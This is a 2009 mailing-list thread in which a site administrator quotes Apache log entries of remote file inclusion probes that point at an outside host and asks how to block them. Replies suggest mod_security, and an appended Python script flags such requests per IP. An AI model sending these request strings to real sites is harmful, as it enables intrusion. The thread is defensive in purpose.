Software, utility, or script to block automatically these cracker attacks
Jose R R
jose.r.r at metztli.com
Wed Aug 5 19:38:23 UTC 2009
> Although I go through my logs fairly often and update my scripts on a regular basis, I still get cracker attacks like the ones sampled
> below:
>
> 222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3;
> i686 Linux; 20020515)"
> 222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET /blog/index.php/2008/06/02///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
> HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
> rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
>
> I would appreciate suggestions to block automatically the above. I am already using Fail2ban and some rules in IP tables. Notwithstanding, those above manage to get through.
>
> Thanks in advance for any input.
On Wed, Aug 5, 2009 at 12:14 PM, Daniel Carrillo<daniel.carrillo at gmail.com> wrote:
[...]
> If you are using Apache, the "authoritative" tool is mod_security, a
> web application firewall.
> With a simple set of rules you can drop these requests.
> Hope this helps.
> On Wed, Aug 5, 2009 at 12:17 PM, Marti, Rob<RJM002 at shsu.edu> wrote:
> http://www.modsecurity.org/
> Apache plugin that will stop most/all of these kinds of attacks. Test it before you enable it because it has
> the potential to stop all kinds of traffic :)
> Rob Marti
Well, noticing the issues that ESGLinux was experiencing with your
mod_security advice, I was hoping there was something else. On the
other hand, thanks for reiterating the advice --I guess there is no
way around it :-) if I want to keep more secure site(s).
Best Regards and thank you again.
--
Jose R R
http://www.metztli-it.com
---------------------------------------------------------------------------------------------
IBM Lotus Symphony supported on GNU/Linux, Mac OS, and Windows.
---------------------------------------------------------------------------------------------
Daylight Saving Time in USA & Canada starts: Sunday 08 March 2009
---------------------------------------------------------------------------------------------
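A log check for the two probes quoted in the thread, as an added example that is not part of the original messages: it flags requests whose query string names a PHP superglobal or carries a remote URL as a value, and counts probes per client address whatever status Apache returned. The function names, the shortened user agents and the third, benign log line are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined log prefix: client IP, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3})')
# A PHP superglobal used as a parameter name, e.g. ?_SERVER[DOCUMENT_ROOT]=...
SUPERGLOBAL_RE = re.compile(
    r'(?:^|[?&/])(?:_(?:SERVER|GET|POST|COOKIE|FILES|ENV|REQUEST|SESSION)|GLOBALS)\s*[\[=]')
# A parameter whose value is itself a remote URL.
REMOTE_URL_RE = re.compile(r'=\s*(?:https?|ftp)://', re.I)

def reasons_for(line):
    """Return (client_ip, [reasons]) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, _status = m.groups()
    # Decode everything after the first '?' once so %5B / %3A variants also match.
    query = unquote(target.partition('?')[2])
    reasons = []
    if SUPERGLOBAL_RE.search(query):
        reasons.append('superglobal-override')
    if REMOTE_URL_RE.search(query):
        # Legitimate redirect parameters can look like this; allowlist them.
        reasons.append('remote-url-value')
    return ip, reasons

def offenders(lines):
    """Count superglobal-override probes per client IP, regardless of status code."""
    hits = Counter()
    for line in lines:
        parsed = reasons_for(line)
        if parsed and 'superglobal-override' in parsed[1]:
            hits[parsed[0]] += 1
    return dict(hits)

# The two requests from the post (unwrapped, user agents shortened) plus one
# constructed benign request from a documentation address.
SAMPLE = [
    '222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET /blog/index.php/2008/06/02/'
    'os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]='
    'http://bruntil.com/cgi/id.txt?%0D? HTTP/1.1" 400 567 "-" "Mozilla/5.0"',
    '222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET /blog/index.php/2008/06/02///'
    '?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D? HTTP/1.1" 500 - "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Aug/2009:08:12:01 -0700] "GET /blog/index.php?blog=4&page=2 '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
print(offenders(SAMPLE))
```

The per-address counts can be fed to whatever blocking is already in place, such as the Fail2ban and iptables setup mentioned in the thread.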